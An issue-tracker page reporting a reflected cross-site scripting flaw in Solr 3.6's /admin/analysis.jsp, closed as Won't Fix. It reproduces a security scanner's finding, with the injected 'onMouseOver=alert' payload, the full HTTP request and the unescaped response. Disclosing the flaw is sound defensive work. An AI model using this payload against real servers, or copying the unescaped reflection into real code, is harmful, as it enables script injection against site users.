Uploaded image for project: 'Solr'
  1. Solr
  2. SOLR-4305

XSS vulnerability in Solr /admin/analysis.jsp



    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Won't Fix
    • Affects Version/s: 3.6
    • Fix Version/s: None
    • Component/s: multicore
    • Labels:
    • Environment:



      This issue was found when running solr 3.6 in solaris, in a multicore setup. Each core had a cross site scripting vulnerability found at /admin/analysis.jsp while testing using IBM Rational AppScan

      Here are the details of the scan result as given by IBM Rational AppScan:

      [1 of 1] Cross-Site Scripting
      Severity: High
      Test Type: Application
      Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter: name)
      CVE ID(s): N/A
      CWE ID(s): 79 (parent of 83)
      Remediation Tasks: Review possible solutions for hazardous character injection
      Variant 1 of 6 [ID=19389]
      The following changes were applied to the original request:
      • Set parameter 'name's value to '" onMouseOver=alert(39846)//'
      12/10/2012 3:33:04 PM 16/187
      POST /solr/<core>/admin/analysis.jsp HTTP/1.1
      Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9
      Content-Length: 96
      Accept: /
      Accept-Language: en-us
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
      Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
      Media Center PC 6.0; Tablet PC 2.0)
      Host: <server>:8443
      Content-Type: application/x-www-form-urlencoded
      Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on
      nt=type&name=" onMouseOver=alert
      HTTP/1.1 200 OK
      Content-Length: 1852
      Server: Apache-Coyote/1.1
      Content-Type: text/html;charset=utf-8
      Date: Mon, 10 Dec 2012 15:54:38 GMT
      var host_name="<server>"
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <link rel="stylesheet" type="text/css" href="solr-admin.css">
      <link rel="icon" href="favicon.ico" type="image/ico"></link>
      <link rel="shortcut icon" href="favicon.ico" type="image/ico"></link>
      <title>Solr admin page</title>
      <a href="."><img border="0" align="right" height="78" width="142"
      src="solr_small.png" alt="Solr"></a>
      <h1>Solr Admin (Cares)
      cwd=/export/home/kh SolrHome=/solr/<core>/
      12/10/2012 3:33:04 PM 17/187
      HTTP caching is ON
      <br clear="all">
      <h2>Field Analysis</h2>
      <form method="POST" action="analysis.jsp" accept-charset="UTF-8">
      <select name="nt">
      <option >name</option>
      <option selected="selected">type</option>
      <input class="std" name="name" type="text" value="" onMouseOver=alert(39846)//">
      <strong>Field value (Index)</strong>
      verbose output
      <input name="verbose" type="checkbox"
      checked="true" >
      highlight matches
      <input name="highlight" type="checkbox"
      checked="true" >
      <textarea class="std" rows="8" cols="70" name="val">1234</textarea>
      <strong>Field value (Query)</strong>
      verbose output
      <input name="qverbose" type="checkbox"
      checked="true" >
      <textarea class="std" rows="1" cols="70" name="qval">1234</textarea>
      <input class="stdbutton" type="submit" value="analyze">
      <strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong>
      12/10/2012 3:33:04 PM 18/187
      Validation In Response:
      • option>
      <option selected="selected">type</option>
      <input class="std" name="name" type="text" value="" onMouseOver=alert
      <strong>Field value (Index)</strong>
      verbose output
      The test successfully embedded a script in the response, which will be executed once the user
      activates the OnMouseOver function (i.e., hovers with the mouse cursor over the vulnerable
      control). This means that the application is vulnerable to Cross-Site Scripting attacks.
      CWE ID:
      83 (child of 79)
      Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp
      Total of 1 security issues in this URL




            • Assignee:
              rbjbrooks Rob Brooks
            • Votes:
              0 Vote for this issue
              3 Start watching this issue


              • Created: